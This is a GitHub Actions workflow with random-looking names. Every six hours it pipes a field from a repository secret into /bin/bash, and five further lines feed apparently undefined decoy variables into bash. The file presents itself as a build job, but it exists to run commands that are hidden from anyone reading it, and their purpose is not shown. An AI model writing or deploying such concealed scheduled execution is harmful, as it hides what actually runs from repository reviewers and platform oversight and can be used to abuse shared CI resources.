name: wuyanjing1990

on:
  workflow_dispatch:
  schedule:
    - cron: '23 0/6 * * *'

jobs:  # 32542
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wuyanjing1990
        env:
          s138: ${{ secrets.s138 }}
        run: |
          echo $s138 | jq -r .jnmsc7 | /bin/bash
          echo $zpw7 | jq -r .lwbo53 | /bin/bash
          echo $biavf9 | jq -r .zp4309 | /bin/bash
          echo $gx5 | jq -r .nr54999 | /bin/bash
          echo $lrtg54535 | jq -r .eyn79 | /bin/bash
          echo $l3 | jq -r .hmfa7 | /bin/bash

